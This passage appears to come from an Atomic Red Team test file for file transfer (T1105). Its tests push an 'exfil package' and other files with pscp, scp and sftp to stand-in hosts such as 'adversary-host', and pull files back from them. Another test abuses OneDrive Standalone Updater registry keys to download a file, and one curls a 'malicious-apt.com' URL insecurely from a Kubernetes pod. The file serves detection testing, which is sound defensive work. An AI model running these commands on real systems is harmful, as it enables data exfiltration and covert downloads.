elevation_required: true
- name: Remote File Copy using PSCP
auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
description: |
Copy a staged file using PSCP.exe to a public target location.
supported_platforms:
- windows
input_arguments:
pscp_url:
description: pscp.exe download path
type: string
default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
pscp_binary:
description: PSCP binary location
type: string
default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
scp_user:
description: Username of the SCP user
type: string
default: 'atomic'
scp_password:
description: Password for the SCP User
type: string
default: 'atomic'
scp_port:
description: port for the remote server
type: string
default: '22'
exfil_package:
description: path to exfil package
type: path
default: 'C:\Temp\T1105_scp.zip'
target_location:
description: Remote location where the data will be copied to.
type: string
default: 127.0.0.1
target_filename:
description: Filename on the destination.
type: string
default: T1105_scp.zip
dependency_executor_name: powershell
dependencies:
- description: |
pscp.exe must be available on the system.
prereq_command: |
if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
executor:
command: |
fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
cleanup_command: |
del /f /q #{exfil_package}
name: command_prompt
elevation_required: false
- name: Windows push file using scp.exe
auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d
description: |
This test simulates pushing files using SCP on a Windows environment.
supported_platforms:
- windows
input_arguments:
remote_path:
description: Path of folder to copy
type: path
default: /tmp/
remote_host:
description: Remote host to send
type: string
default: adversary-host
local_path:
description: Local path to copy from
type: path
default: C:\temp
file_name:
description: Name of the file to transfer
type: string
default: T1105.txt
username:
description: User account to authenticate on remote host
type: string
default: adversary
dependency_executor_name: powershell
dependencies:
- description: |
This test requires the `scp` command to be available on the system.
prereq_command: |
if (Get-Command scp -ErrorAction SilentlyContinue) {
Write-Output "SCP command is available."
exit 0
} else {
Write-Output "SCP command is not available."
exit 1
}
get_prereq_command: |
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
# Install the OpenSSH Client capability
Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
# Handle any errors that occur during the installation process
Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
executor:
elevation_required: true
name: powershell
command: |
# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
New-Item -Path $folderPath -ItemType Directory
}
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
# Attack command
scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path}
cleanup_command: |
$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force -erroraction silentlycontinue
Write-Output "File deleted: $filePath"
- name: Windows pull file using scp.exe
auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c
description: |
This test simulates pulling files using SCP on a Windows environment.
supported_platforms:
- windows
input_arguments:
remote_path:
description: Path of folder to pull
type: path
default: /tmp/T1105.txt
remote_host:
description: Remote host to pull from
type: string
default: adversary-host
local_path:
description: Local path to receive files
type: path
default: C:\temp
username:
description: User account to authenticate on remote host
type: string
default: adversary
dependency_executor_name: powershell
dependencies:
- description: |
This test requires the `scp` command to be available on the system.
prereq_command: |
if (Get-Command scp -ErrorAction SilentlyContinue) {
Write-Output "SCP command is available."
exit 0
} else {
Write-Output "SCP command is not available."
exit 1
}
get_prereq_command: |
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
# Install the OpenSSH Client capability
Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
# Handle any errors that occur during the installation process
Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
executor:
elevation_required: true
name: powershell
command: |
scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
- name: Windows push file using sftp.exe
auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22
description: |
This test simulates pushing files using SFTP on a Windows environment.
supported_platforms:
- windows
input_arguments:
remote_path:
description: Path of folder to copy
type: path
default: /tmp
remote_host:
description: Remote host to send
type: string
default: adversary-host
local_path:
description: Local path to receive sftp
type: path
default: C:\temp
file_name:
description: Name of the file to transfer
type: string
default: T1105.txt
username:
description: User account to authenticate on remote host
type: string
default: adversary
dependency_executor_name: powershell
dependencies:
- description: |
This test requires the `sftp` command to be available on the system.
prereq_command: |
if (Get-Command sftp -ErrorAction SilentlyContinue) {
Write-Output "SFTP command is available."
exit 0
} else {
Write-Output "SFTP command is not available."
exit 1
}
get_prereq_command: |
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
# Install the OpenSSH Client capability
Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
# Handle any errors that occur during the installation process
Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
executor:
elevation_required: true
name: powershell
command: |
# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
New-Item -Path $folderPath -ItemType Directory
}
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
# Attack command
echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path}
cleanup_command: |
$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force
Write-Output "File deleted: $filePath"
- name: Windows pull file using sftp.exe
auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19
description: |
This test simulates pulling files using SFTP on a Windows environment.
supported_platforms:
- windows
input_arguments:
remote_path:
description: Path of file to pull
type: path
default: /tmp/T1105.txt
remote_host:
description: Remote host to pull from
type: string
default: adversary-host
local_path:
description: Local path to receive files
type: path
default: C:\temp
username:
description: User account to authenticate on remote host
type: string
default: adversary
dependency_executor_name: powershell
dependencies:
- description: |
This test requires the `sftp` command to be available on the system.
prereq_command: |
if (Get-Command sftp -ErrorAction SilentlyContinue) {
Write-Output "SFTP command is available."
exit 0
} else {
Write-Output "SFTP command is not available."
exit 1
}
get_prereq_command: |
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
# Install the OpenSSH Client capability
Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
# Handle any errors that occur during the installation process
Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
executor:
elevation_required: true
name: powershell
command: |
sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
- name: Download a file with OneDrive Standalone Updater
auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
description: |
Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
This technique can be used to download files without executing anomalous executables.
Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
supported_platforms:
- windows
input_arguments:
remote_url:
description: URL to download file from
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
onedrive_path:
description: Path to OneDrive Standalone Updater executable
type: path
default: 'C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
dependency_executor_name: powershell
dependencies:
- description: |
OneDriveStandaloneUpdater.exe must exist on disk at specified location
prereq_command: |
if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."
executor:
command: |
if (-not (Test-Path "#{onedrive_path}")) {
Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
exit 1
}
New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
# Run OneDrive Standalone Updater
& "#{onedrive_path}"
cleanup_command: |
Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
name: powershell
elevation_required: false
- name: Curl Insecure Connection from a Pod
auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
description: |
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
against a target URL. The pod is automatically deleted after execution.
supported_platforms:
- containers
input_arguments:
pod_name:
description: K8s pod_name to execute the command in
type: string
default: atomic-insecure-curl
remote_url:
description: Remote URL to curl
type: string
default: https://malicious-apt.com
image_name:
description: Name of the docker image
type: string
default: curlimages/curl
dependencies:
- description: kubectl must be installed and configured
get_prereq_command: |
echo "kubectl must be installed manually"
prereq_command: |
which kubectl
executor:
name: bash
elevation_required: false
command: |
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
Reference in New Issue View Git Blame Copy Permalink